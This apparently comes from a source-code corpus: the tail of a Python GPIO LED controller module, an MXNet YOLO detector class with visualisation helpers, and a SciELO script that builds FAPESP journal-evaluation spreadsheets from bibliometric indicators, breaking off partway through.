def __init__(self):
self.q = Queue(maxsize=0)
self.thr = ThreadToServiceGPIOLED(self.q)
def set_this_group_as_default(self, color_chain):
self.q.put([color_chain, 0])
def flash_this_group_only_once(self, color_chain):
self.q.put([color_chain, 1])
def flash_this_group_repeatedly(self, color_chain, count):
self.q.put([color_chain, count])
def set_default_led_color(self, a_color):
self.q.put([[(a_color, .2)], 0])
def flash_this_led_color_once(self, a_color, dur):
self.q.put([[(a_color, dur)], 1])
MyLEDController = _MyLEDController() if MAPLEDRIVE else None
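
# Illustrative usage sketch (editor's addition, not part of the original
# module); it assumes MAPLEDRIVE is configured so MyLEDController is not None
# and that the GPIO pin constants above have been filled in.
#
#   setup_gpio()
#   MyLEDController.set_default_led_color(GREEN)
#   MyLEDController.flash_this_led_color_once(RED, 0.5)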
| gpl-3.0 | 1,488,395,012,073,988,600 | 31.442105 | 164 | 0.571544 | false |
liumusicforever/mxnet-yolo | detect/detector.py | 1 | 7005 | from __future__ import print_function
import mxnet as mx
import numpy as np
from timeit import default_timer as timer
from dataset.testdb import TestDB
from dataset.iterator import DetIter
class Detector(object):
"""
SSD detector which hold a detection network and wraps detection API
Parameters:
----------
symbol : mx.Symbol
detection network Symbol
model_prefix : str
name prefix of trained model
epoch : int
load epoch of trained model
data_shape : int
input data resize shape
mean_pixels : tuple of float
(mean_r, mean_g, mean_b)
batch_size : int
run detection with batch size
ctx : mx.ctx
device to use, if None, use mx.cpu() as default context
"""
def __init__(self, symbol, model_prefix, epoch, data_shape, mean_pixels, \
batch_size=1, ctx=None):
self.ctx = ctx
if self.ctx is None:
self.ctx = mx.cpu()
load_symbol, args, auxs = mx.model.load_checkpoint(model_prefix, epoch)
if symbol is None:
symbol = load_symbol
self.mod = mx.mod.Module(symbol, label_names=("yolo_output_label",), context=ctx)
self.data_shape = data_shape
self.mod.bind(data_shapes=[('data', (batch_size, 3, data_shape, data_shape))],
label_shapes=[('yolo_output_label', (batch_size, 2, 5))])
self.mod.set_params(args, auxs)
self.data_shape = data_shape
self.mean_pixels = mean_pixels
def detect(self, det_iter, show_timer=False):
"""
detect all images in iterator
Parameters:
----------
det_iter : DetIter
iterator for all testing images
show_timer : Boolean
whether to print out detection exec time
Returns:
----------
list of detection results
"""
num_images = det_iter._size
if not isinstance(det_iter, mx.io.PrefetchingIter):
det_iter = mx.io.PrefetchingIter(det_iter)
# import time
# time.sleep(5) # delays for 5 seconds
# print("Stop sleep")
start = timer()
detections = self.mod.predict(det_iter).asnumpy()
time_elapsed = timer() - start
if show_timer:
print("Detection time for {} images: {:.4f} sec".format(
num_images, time_elapsed))
result = []
for i in range(detections.shape[0]):
det = detections[i, :, :]
res = det[np.where(det[:, 0] >= 0)[0]]
result.append(res)
# tmp_result = []
# result = []
# start = timer()
# for det in self.mod.iter_predict(det_iter):
# det = det[0][0][0].as_in_context(mx.cpu())
# tmp_result.append(det)
# time_elapsed = timer() - start
# if show_timer:
# print("Detection time for {} images: {:.4f} sec".format(
# num_images, time_elapsed))
# for det in tmp_result:
# det = det.asnumpy()
# res = det[np.where(det[:, 0] >= 0)[0]]
# result.append(res)
return result
def im_detect(self, im_list, root_dir=None, extension=None, show_timer=False):
"""
wrapper for detecting multiple images
Parameters:
----------
im_list : list of str
image path or list of image paths
root_dir : str
directory of input images, optional if image path already
has full directory information
extension : str
image extension, eg. ".jpg", optional
Returns:
----------
list of detection results in format [det0, det1...], det is in
format np.array([id, score, xmin, ymin, xmax, ymax]...)
"""
test_db = TestDB(im_list, root_dir=root_dir, extension=extension)
test_iter = DetIter(test_db, 1, self.data_shape, self.mean_pixels,
is_train=False)
return self.detect(test_iter, show_timer)
def visualize_detection(self, img, dets, classes=[], thresh=0.6):
"""
visualize detections in one image
Parameters:
----------
img : numpy.array
image, in bgr format
dets : numpy.array
ssd detections, numpy.array([[id, score, x1, y1, x2, y2]...])
each row is one object
classes : tuple or list of str
class names
thresh : float
score threshold
"""
import matplotlib.pyplot as plt
import random
plt.imshow(img)
height = img.shape[0]
width = img.shape[1]
colors = dict()
for i in range(dets.shape[0]):
cls_id = int(dets[i, 0])
if cls_id >= 0:
score = dets[i, 1]
if score > thresh:
if cls_id not in colors:
colors[cls_id] = (random.random(), random.random(), random.random())
xmin = int(dets[i, 2] * width)
ymin = int(dets[i, 3] * height)
xmax = int(dets[i, 4] * width)
ymax = int(dets[i, 5] * height)
rect = plt.Rectangle((xmin, ymin), xmax - xmin,
ymax - ymin, fill=False,
edgecolor=colors[cls_id],
linewidth=3.5)
plt.gca().add_patch(rect)
class_name = str(cls_id)
if classes and len(classes) > cls_id:
class_name = classes[cls_id]
plt.gca().text(xmin, ymin - 2,
'{:s} {:.3f}'.format(class_name, score),
bbox=dict(facecolor=colors[cls_id], alpha=0.5),
fontsize=12, color='white')
plt.show()
def detect_and_visualize(self, im_list, root_dir=None, extension=None,
classes=[], thresh=0.6, show_timer=False):
"""
wrapper for im_detect and visualize_detection
Parameters:
----------
im_list : list of str or str
image path or list of image paths
root_dir : str or None
directory of input images, optional if image path already
has full directory information
extension : str or None
image extension, eg. ".jpg", optional
Returns:
----------
"""
import cv2
dets = self.im_detect(im_list, root_dir, extension, show_timer=show_timer)
if not isinstance(im_list, list):
im_list = [im_list]
assert len(dets) == len(im_list)
for k, det in enumerate(dets):
img = cv2.imread(im_list[k])
img[:, :, (0, 1, 2)] = img[:, :, (2, 1, 0)]
self.visualize_detection(img, det, classes, thresh)
| mit | 3,145,396,783,711,416,000 | 35.675393 | 92 | 0.513919 | false |
scieloorg/journals-catalog | jcatalog/reports/fapesp_evaluation_line.py | 1 | 43533 | # coding: utf-8
import pyexcel
import xlsxwriter
import models
import re
import datetime
from accent_remover import *
def formatindicator(indicator):
data = indicator
if type(indicator) == str:
if '.' in indicator and '>' not in indicator:
data = float(indicator)
return data
def formatjcr(indicator):
data = indicator
if type(indicator) == str:
if '.' in indicator and '>' not in indicator:
data = float(indicator)
elif '>10' in indicator:
data = 10
else:
data = None
return data
def formatman(indicator):
data = indicator
if type(indicator) == str:
data = None
return data
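# Behaviour of the three format helpers above, derived from the code itself:
#   formatindicator('1.23') -> 1.23    formatindicator('n/a') -> 'n/a'
#   formatjcr('1.23') -> 1.23          formatjcr('>10') -> 10    formatjcr('n/a') -> None
#   formatman('3') -> None (any string is discarded)    formatman(3) -> 3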
def timesfmt(data):
if isinstance(data, float):
num = round(data, 2)
elif isinstance(data, int):
num = data
    else:
        # Anything that is not a float or an int (e.g. a string) has no usable
        # value here; returning None also avoids an unbound "num" for other types.
        num = None
return num
def journal(query, filename, sheetname, issn, atfile):
    # Create the Excel workbook and add a worksheet
if issn:
workbook = xlsxwriter.Workbook('output/journals/' + filename)
worksheet = workbook.add_worksheet(sheetname)
else:
workbook = xlsxwriter.Workbook('output/' + filename)
worksheet = workbook.add_worksheet(sheetname)
worksheet.freeze_panes(1, 0)
worksheet.set_row(0, 70)
# HEADER
col = 0
wrap_header = workbook.add_format({'text_wrap': True, 'size': 9})
format_date_iso = workbook.add_format({'num_format': 'yyyymmdd'})
sheet_header = pyexcel.get_sheet(
file_name='data/scielo/rotulos_avaliacao_fapesp_abel.xlsx',
sheet_name='rotulos_dados_periodicos',
name_columns_by_row=0)
headers = sheet_header.to_records()
for h in headers:
worksheet.write(0, col, h['rotulo_portugues'], wrap_header)
col += 1
extraction_date = models.Scielofapesp.objects.first().extraction_date
# SciELO
scielo = query
row = 1
for doc in scielo:
for h in [
'anterior',
'2008',
'2009',
'2010',
'2011',
'2012',
'2013',
'2014',
'2015',
'2016',
'2017',
'2018'
]:
print(doc.issn_scielo + '_' + str(h))
col = 0
worksheet.write(row, col, extraction_date, format_date_iso)
col += 1
            # active in 2018
active = 0
if doc.title_current_status == 'current':
active = 1
worksheet.write(row, col, active)
col += 1
            # active in the given year
ativo_y = 0
if 'docs' in doc:
if 'docs_' + h in doc['docs']:
# print(doc['docs']['docs_'+h])
if doc['docs']['docs_' + h] == '':
ativo_y = 0
elif int(doc['docs']['docs_' + h]) > 0:
ativo_y = 1
worksheet.write(row, col, ativo_y)
col += 1
# ISSN SciELO
worksheet.write(row, col, doc.issn_scielo)
col += 1
worksheet.write(row, col, '; '.join(doc.issn_list))
col += 1
worksheet.write(row, col, doc.title)
col += 1
if doc['is_scopus'] == 1:
scopus = models.Scopus.objects.filter(id=str(doc.scopus_id))[0]
worksheet.write(row, col, scopus.title)
col += 1
if doc['is_wos'] == 1:
# wos = models.Wos.objects.filter(id=str(doc.wos_id))[0]
worksheet.write(row, col, doc['wos_indexes'][0]['title'])
col += 1
            # DOI prefix and publisher
worksheet.write(row, col, doc.crossref['doi_provider']['prefix'])
col += 1
worksheet.write(row, col, doc.crossref[
'doi_provider']['publisher'])
col += 1
if 'url' in doc['api']:
worksheet.write(row, col, doc.api['url'])
col += 1
# URL
doajapi = models.Doajapi.objects.filter(issn_list=doc.issn_scielo)
if doajapi:
if 'editorial_review' in doajapi[0]['results'][0]['bibjson']:
url_journal = doajapi[0]['results'][0][
'bibjson']['editorial_review']['url']
worksheet.write(row, col, url_journal)
col += 1
# Publisher Name
worksheet.write(row, col, doc.publisher_name)
col += 1
# Country
worksheet.write(row, col, doc.country)
col += 1
if doc['is_scopus'] == 1:
scopus = models.Scopus.objects.filter(id=str(doc.scopus_id))[0]
worksheet.write(row, col, scopus.country)
col += 1
if doc['is_wos'] == 1:
for i in doc['issn_list']:
wos = models.Wos.objects.filter(issn_list=i)
if len(wos) > 0:
worksheet.write(row, col, wos[0].country)
else:
worksheet.write(row, col, doc.country)
col += 1
# Submissions - Manager System
col = 16
submiss = models.Submissions.objects.filter(
issn_list=doc.issn_scielo)
if submiss:
                # description of the submission management system
sist = 'ND'
if submiss[0]['scholarone'] == 1:
sist = 'ScholarOne'
elif submiss[0]['ojs_scielo'] == 1:
sist = 'OJS-SciELO'
elif submiss[0]['ojs_outro'] == 1:
sist = 'OJS-Outro'
elif submiss[0]['outro'] == 1:
sist = 'Outro'
worksheet.write(row, col, sist)
col += 1
if 'scholarone' in submiss[0]:
worksheet.write(row, col, submiss[0]['scholarone'] or 0)
col += 1
if 'ojs_scielo' in submiss[0]:
worksheet.write(row, col, submiss[0]['ojs_scielo'] or 0)
col += 1
if 'ojs_outro' in submiss[0]:
worksheet.write(row, col, submiss[0]['ojs_outro'] or 0)
col += 1
                # For "outro" (other) or ND == 1
if 'outro' in submiss[0]:
worksheet.write(row, col, submiss[0]['outro'] or 0)
col += 1
else:
                # "Outro" (other) for journals without this information
worksheet.write(row, col, "Outro")
col += 1
                # 0 for journals without this information
worksheet.write(row, col, 0)
col += 1
worksheet.write(row, col, 0)
col += 1
worksheet.write(row, col, 0)
col += 1
                # mark 1 in the "outro" column - journal without this information
worksheet.write(row, col, 1)
col += 1
            # ORCID adoption
col = 21
if 'orcid' in doc:
worksheet.write(row, col, 1)
col += 1
worksheet.write(row, col, 0)
col += 1
else:
worksheet.write(row, col, 0)
col += 1
worksheet.write(row, col, 0)
col += 1
            # SciELO evaluation - institution type
col = 23
if 'avaliacao' in doc:
if 'tipo_inst' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['tipo_inst'])
col += 1
if 'tipo_1' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['tipo_1'])
else:
if doc['avaliacao']['tipo_inst'] == 1:
worksheet.write(row, col, 1)
col += 1
if 'tipo_2' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['tipo_2'])
else:
if doc['avaliacao']['tipo_inst'] == 2:
worksheet.write(row, col, 1)
col += 1
if 'tipo_3' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['tipo_3'])
else:
if doc['avaliacao']['tipo_inst'] == 3:
worksheet.write(row, col, 1)
col += 1
if 'tipo_4' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['tipo_4'])
else:
if doc['avaliacao']['tipo_inst'] == 4:
worksheet.write(row, col, 1)
col += 1
if 'inst_n1' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['inst_n1'])
col += 1
if 'inst_n2' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['inst_n2'])
col += 1
if 'inst_n3' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['inst_n3'])
col += 1
if 'contatos' in doc['avaliacao']:
count = 0
for c in doc['avaliacao']['contatos']:
name = None
lattes = None
orcid = None
if c['cargo'] == 'Editor-chefe' or c['cargo'] == 'Editor':
count += 1
name = c['first_name'] + ' ' + c['last_name']
lattes = c['cv_lattes_editor_chefe']
orcid = c['orcid_editor_chefe']
if name:
worksheet.write(row, col, name)
col += 1
if lattes:
worksheet.write(row, col, lattes)
col += 1
if orcid:
worksheet.write(row, col, orcid)
col += 1
if count == 3:
break
else:
col += 17
# Thematic Areas
col = 40
for k in [
'title_thematic_areas',
'title_is_agricultural_sciences',
'title_is_applied_social_sciences',
'title_is_biological_sciences',
'title_is_engineering',
'title_is_exact_and_earth_sciences',
'title_is_health_sciences',
'title_is_human_sciences',
'title_is_linguistics_letters_and_arts',
'title_is_multidisciplinary'
]:
if k in doc:
worksheet.write(row, col, doc[k])
col += 1
# Wos Categories
col = 50
if 'wos_subject_areas' in doc['api']:
worksheet.write(row, col, '; '.join(
doc['api']['wos_subject_areas']))
col += 1
            # History
worksheet.write(row, col, doc.title_current_status)
col += 1
if 'first_year' in doc['api']:
worksheet.write(row, col, int(doc['api']['first_year']))
col += 1
worksheet.write(row, col, doc.inclusion_year_at_scielo)
col += 1
if 'stopping_year_at_scielo' in doc:
worksheet.write(row, col, doc.stopping_year_at_scielo)
col += 1
worksheet.write(
row, col, doc.date_of_the_first_document, format_date_iso)
col += 1
worksheet.write(
row, col, doc.date_of_the_last_document, format_date_iso)
col += 1
# APC
col = 57
if 'apc' in doc:
if doc['apc']['apc'] == 'Sim':
worksheet.write(row, col, 1)
else:
worksheet.write(row, col, 0)
col += 1
# if doc['apc']['value']:
# worksheet.write(row, col, doc['apc']['value'])
# col += 1
if doc['apc']['comments']:
worksheet.write(row, col, doc['apc']['comments'])
col += 1
apc_list = []
for f in range(1, 9):
coin = None
value = None
concept = None
if 'apc' + str(f) + '_value_coin':
coin = doc['apc']['apc' + str(f) + '_value_coin']
value = doc['apc']['apc' + str(f) + '_value']
concept = doc['apc']['apc' + str(f) + '_concept']
if coin or value or concept:
apc_list.append('[%s) value: %s %s - concept: %s]' %
(str(f), coin, value, concept))
if apc_list:
worksheet.write(row, col, '; '.join(apc_list))
col += 1
else:
worksheet.write(row, col, 0)
col += 4
            # Indexing
col = 60
worksheet.write(row, col, doc.is_scopus)
col += 1
worksheet.write(row, col, doc.is_jcr)
col += 1
# WOS
worksheet.write(row, col, doc.is_wos)
col += 1
# SCIE
scie = 0
if 'wos_indexes' in doc:
for i in doc['wos_indexes']:
if 'scie' in i['index']:
scie = 1
break
worksheet.write(row, col, scie)
col += 1
# SSCI
ssci = 0
if 'wos_indexes' in doc:
for i in doc['wos_indexes']:
if 'ssci' in i['index']:
ssci = 1
break
worksheet.write(row, col, ssci)
col += 1
# A&HCI
ahci = 0
if 'wos_indexes' in doc:
for i in doc['wos_indexes']:
if 'ahci' in i['index']:
ahci = 1
break
worksheet.write(row, col, ahci)
col += 1
# ESCI
esci = 0
if 'wos_indexes' in doc:
for i in doc['wos_indexes']:
if 'esci' in i['index']:
esci = 1
break
worksheet.write(row, col, esci)
col += 1
# Pubmed, PMC
col = 67
pubmed = models.Pubmedapi.objects.filter(issn_list=doc.issn_scielo)
if pubmed:
if 'pubmed' in pubmed[0]['db_name']:
worksheet.write(row, col, 1 or 0)
col += 1
if 'pmc' in pubmed[0]['db_name']:
worksheet.write(row, col, 1 or 0)
col += 1
else:
worksheet.write(row, col, 0)
col += 1
worksheet.write(row, col, 0)
col += 1
            # PUBLICATION YEAR
col = 69
if h == 'anterior':
year = '2007'
else:
year = h
worksheet.write(row, col, int(year))
col += 1
            # Documents
if 'docs' in doc:
if 'docs_' + h in doc['docs']:
worksheet.write(row, col, doc['docs']['docs_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'document_en_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'document_en_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'document_pt_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'document_pt_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'document_es_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'document_es_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'doc_2_more_lang_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'doc_2_more_lang_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'document_other_languages_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'document_other_languages_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
# CITABLES
if 'is_citable_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'is_citable_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'tipo_review_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'tipo_review_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'citable_en_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'citable_en_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'citable_pt_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'citable_pt_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'citable_es_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'citable_es_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'citable_doc_2_more_lang_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'citable_doc_2_more_lang_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'citable_other_lang_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'citable_other_lang_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
else:
col += 13
            # Accesses
col = 83
if 'access' in doc:
if h == 'anterior':
pass
elif h == '2011':
hy = 'anterior'
for yacc in [
'anterior',
'2012',
'2013',
'2014',
'2015',
'2016',
'2017',
'2018'
]:
if 'pub_' + hy + '_acc_anterior' in doc['access']:
worksheet.write(row, col, doc['access'][
'pub_' + hy + '_acc_' + yacc])
else:
worksheet.write(row, col, 0)
col += 1
elif int(h) > 2011:
for yacc in [
'anterior',
'2012',
'2013',
'2014',
'2015',
'2016',
'2017',
'2018'
]:
if 'pub_' + h + '_acc_' + yacc in doc['access']:
worksheet.write(row, col, doc['access'][
'pub_' + h + '_acc_' + yacc] or 0)
else:
worksheet.write(row, col, 0)
col += 1
else:
col += 8
# SciELO CI WOS cited
col = 91
if 'scieloci' in doc:
if h == 'anterior':
pass
else:
year = str(h)
if 'docs_' + year in doc['scieloci']:
worksheet.write(
row, col, doc['scieloci']['docs_' + year])
col += 1
if 'is_citable_' + year in doc['scieloci']:
worksheet.write(row, col, doc['scieloci'][
'is_citable_' + year])
col += 1
if 'scieloci_cited_' + year in doc['scieloci']:
worksheet.write(row, col, doc['scieloci'][
'scieloci_cited_' + year])
col += 1
if 'scieloci_wos_cited_' + year in doc['scieloci']:
worksheet.write(row, col, doc['scieloci'][
'scieloci_wos_cited_' + year])
col += 1
if 'one_o_more_scielo_cited_' + year in doc['scieloci']:
worksheet.write(row, col, doc['scieloci'][
'one_o_more_scielo_cited_' + year])
col += 1
if 'one_o_more_wos_cited_' + year in doc['scieloci']:
worksheet.write(row, col, doc['scieloci'][
'one_o_more_wos_cited_' + year])
col += 1
else:
col += 6
# Google
col = 97
if h == 'anterior':
pass
else:
year = str(h)
if 'google_scholar_h5_' + year in doc:
worksheet.write(row, col, doc['google_scholar_h5_' + year])
col += 1
if 'google_scholar_m5_' + year in doc:
worksheet.write(row, col, doc['google_scholar_m5_' + year])
col += 1
# SCOPUS - CiteScore
col = 99
if doc['is_scopus'] == 1:
if h in scopus and 'citescore' in scopus[h]:
worksheet.write(row, col, formatindicator(
scopus[h]['citescore']))
col += 1
            # Scopus - SNIP - APPLY TO 2007 AS WELL (NO ACCUMULATION)
col = 100
h2 = None
if h == 'anterior':
h2 = '2007'
else:
h2 = h
snip = 0
if doc['is_scopus'] == 1:
if h2 in scopus and 'snip' in scopus[h2]:
worksheet.write(
row, col, formatindicator(scopus[h2]['snip']))
snip = 1
else:
snip = 0
if snip == 0:
if doc['is_cwts'] == 1:
cwts = models.Cwts.objects.filter(id=str(doc.cwts_id))[0]
if h2 in cwts and 'snip' in cwts[h2]:
worksheet.write(
row, col, formatindicator(cwts[h2]['snip']))
snip = 1
col += 1
# SCIMAGO - SJR, tt_docs, tt_cites, cites_by_docs, h_index
col = 101
h2 = None
if h == 'anterior':
h2 = '2007'
else:
h2 = h
if doc['is_scimago'] == 1:
scimago = models.Scimago.objects.filter(
id=str(doc.scimago_id))[0]
for i in [
'sjr',
'total_docs_3years',
'total_cites_3years',
'cites_by_doc_2years',
'h_index'
]:
if h2 in scimago and i in scimago[h2]:
worksheet.write(
row, col, formatindicator(scimago[h2][i]))
col += 1
# JCR
col = 106
if doc['is_jcr'] == 1:
if h == 'anterior':
h2 = '2007'
else:
h2 = h
jcr = models.Jcr.objects.filter(id=str(doc.jcr_id))[0]
for i in [
'total_cites',
'journal_impact_factor',
'impact_factor_without_journal_self_cites',
'five_year_impact_factor',
'immediacy_index',
'citable_items',
'cited_half_life',
'citing_half_life',
'eigenfactor_score',
'article_influence_score',
'percentage_articles_in_citable_items',
'average_journal_impact_factor_percentile',
'normalized_eigenfactor'
]:
if h2 in jcr and i in jcr[h2]:
worksheet.write(row, col, formatjcr(jcr[h2][i]))
col += 1
else:
col += 13
# Affiliations_documents
col = 119
if 'aff' in doc:
if h == 'anterior':
if 'br_ate_2007' in doc['aff']:
worksheet.write(row, col, doc['aff'][
'br_ate_2007'] or 0)
col += 1
if 'estrang_ate_2007' in doc['aff']:
worksheet.write(row, col, doc['aff'][
'estrang_ate_2007'] or 0)
col += 1
if 'nao_ident_ate_2007' in doc['aff']:
worksheet.write(row, col, doc['aff'][
'nao_ident_ate_2007'] or 0)
col += 1
if 'br_estrang_ate_2007' in doc['aff']:
worksheet.write(row, col, doc['aff'][
'br_estrang_ate_2007'] or 0)
col += 1
if 'nao_ident_todos_ate_2007' in doc['aff']:
worksheet.write(row, col, doc['aff'][
'nao_ident_todos_ate_2007'] or 0)
col += 1
if 'br_' + h in doc['aff']:
worksheet.write(row, col, doc['aff']['br_' + h] or 0)
col += 1
if 'estrang_' + h in doc['aff']:
worksheet.write(row, col, doc['aff']['estrang_' + h] or 0)
col += 1
if 'nao_ident_' + h in doc['aff']:
worksheet.write(row, col, doc['aff'][
'nao_ident_' + h] or 0)
col += 1
if 'br_estrang_' + h in doc['aff']:
worksheet.write(row, col, doc['aff'][
'br_estrang_' + h] or 0)
col += 1
if 'nao_ident_todos_' + h in doc['aff']:
worksheet.write(row, col, doc['aff'][
'nao_ident_todos_' + h] or 0)
col += 1
else:
col += 5
            # Manuscripts
col = 124
if 'manuscritos' in doc:
if h == '2014':
col += 4
if 'recebidos_2014' in doc['manuscritos']:
worksheet.write(row, col, formatman(
doc['manuscritos']['recebidos_2014']))
col += 1
if 'aprovados_2014' in doc['manuscritos']:
worksheet.write(row, col, formatman(
doc['manuscritos']['aprovados_2014']))
col += 1
else:
if 'recebidos_' + h + '_1sem' in doc['manuscritos']:
worksheet.write(row, col, formatman(
doc['manuscritos']['recebidos_' + h + '_1sem']))
col += 1
if 'aprovados_' + h + '_1sem' in doc['manuscritos']:
worksheet.write(row, col, formatman(
doc['manuscritos']['aprovados_' + h + '_1sem']))
col += 1
if 'recebidos_' + h + '_2sem' in doc['manuscritos']:
worksheet.write(row, col, formatman(
doc['manuscritos']['recebidos_' + h + '_2sem']))
col += 1
if 'aprovados_' + h + '_2sem' in doc['manuscritos']:
worksheet.write(row, col, formatman(
doc['manuscritos']['aprovados_' + h + '_2sem']))
col += 1
            # Times between submission, approval and publication
col = 130
if 'times' in doc:
if h == 'anterior':
# sub_aprov
if 'media_meses_sub_aprov_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['media_meses_sub_aprov_ate_2007'])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_sub_aprov_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_sub_aprov_ate_2007'])
worksheet.write(row, col, times)
col += 1
# sub_pub
if 'media_meses_sub_pub_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['media_meses_sub_pub_ate_2007'])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_sub_pub_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_sub_pub_ate_2007'])
worksheet.write(row, col, times)
col += 1
# sub_pub_scielo
if 'media_meses_sub_pub_scielo_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['media_meses_sub_pub_scielo_ate_2007'])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_sub_pub_scielo_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_sub_pub_scielo_ate_2007'])
worksheet.write(row, col, times)
col += 1
# aprov_pub
if 'media_meses_aprov_pub_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['media_meses_aprov_pub_ate_2007'])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_aprov_pub_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_aprov_pub_ate_2007'])
worksheet.write(row, col, times)
col += 1
# aprov_pub_scielo
if 'media_meses_aprov_pub_scielo_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['media_meses_aprov_pub_scielo_ate_2007'])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_aprov_pub_scielo_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_aprov_pub_scielo_ate_2007'])
worksheet.write(row, col, times)
col += 1
else:
# sub_aprov
if 'media_meses_sub_aprov_' + h in doc['times']:
times = timesfmt(
doc['times']['media_meses_sub_aprov_' + h])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_sub_aprov_' + h in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_sub_aprov_' + h])
worksheet.write(row, col, times)
col += 1
# sub_pub
if 'media_meses_sub_pub_' + h in doc['times']:
times = timesfmt(
doc['times']['media_meses_sub_pub_' + h])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_sub_pub_' + h in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_sub_pub_' + h])
worksheet.write(row, col, times)
col += 1
# sub_pub_scielo
if 'media_meses_sub_pub_scielo_' + h in doc['times']:
times = timesfmt(
doc['times']['media_meses_sub_pub_scielo_' + h])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_sub_pub_scielo_' + h in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_sub_pub_scielo_' + h])
worksheet.write(row, col, times)
col += 1
# aprov_pub
if 'media_meses_aprov_pub_' + h in doc['times']:
times = timesfmt(
doc['times']['media_meses_aprov_pub_' + h])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_aprov_pub_' + h in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_aprov_pub_' + h])
worksheet.write(row, col, times)
col += 1
# aprov_pub_scielo
if 'media_meses_aprov_pub_scielo_' + h in doc['times']:
times = timesfmt(
doc['times']['media_meses_aprov_pub_scielo_' + h])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_aprov_pub_scielo_' + h in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_aprov_pub_scielo_' + h])
worksheet.write(row, col, times)
col += 1
            # SciELO - citations granted
col = 140
if 'citations' in doc:
for cit in doc['citations']:
if h in cit:
# print(cit[h])
for label in [
'total_citgrant',
'total_citgrant_journals',
'total_citgrant_autocit',
'citgrant_journal_scielo',
'citgrant_journal_scielo_wos',
'citgrant_journal_wos',
'citgrant_journal_other',
'citgrant_other_docs',
'citgrant_books',
'cit_pub_year',
'cit_pubyear_minus1',
'cit_pubyear_minus2',
'cit_pubyear_minus3',
'cit_pubyear_minus4',
'cit_pubyear_minus5',
'cit_pubyear_minus6',
'cit_pubyear_minus7',
'cit_pubyear_minus8',
'cit_pubyear_minus9',
'cit_pubyear_minus10'
]:
citation = cit[h][label]
worksheet.write(row, col, citation or '')
col += 1
else:
col += 20
# Access - Google Analytics
col = 160
if 'ga_access' in doc:
if h == '2017':
for label in [
'total_access',
'porcent_americas',
'porcent_brazil',
'porcent_united_states',
'porcent_asia',
'porcent_china',
'porcent_india',
'porcent_europe',
'porcent_spain',
'porcent_portugal',
'porcent_africa',
'porcent_south_africa',
'porcent_palop',
'porcent_oceania',
'porcent_others'
]:
if label in doc['ga_access']:
ga_access = doc['ga_access'][label]
worksheet.write(row, col, ga_access)
col += 1
else:
col += 15
            # Advance to the next year
row += 1
        # Advance to the next journal
row += 1
# Creates 'areas tematicas' worksheet
formatline = workbook.add_format({'text_wrap': False, 'size': 9})
worksheet3 = workbook.add_worksheet('dados agregados - AT')
worksheet3.freeze_panes(1, 0)
worksheet3.set_row(0, 60)
sheet3 = pyexcel.get_sheet(
file_name=atfile,
sheet_name='import',
name_columns_by_row=0)
sheet3_json = sheet3.to_records()
row = 0
col = 0
for h in sheet3.colnames:
worksheet3.write(row, col, h, wrap_header)
col += 1
row = 1
for line in sheet3_json:
col = 0
for label in sheet3.colnames:
if col == 0:
worksheet3.write(row, col, line[label], format_date_iso)
else:
worksheet3.write(row, col, line[label], formatline)
col += 1
row += 1
# Creates 'descricao rotulos' worksheet
worksheet2 = workbook.add_worksheet('rótulos-dados-periódicos')
worksheet2.set_column(0, 0, 30)
worksheet2.set_column(1, 1, 70)
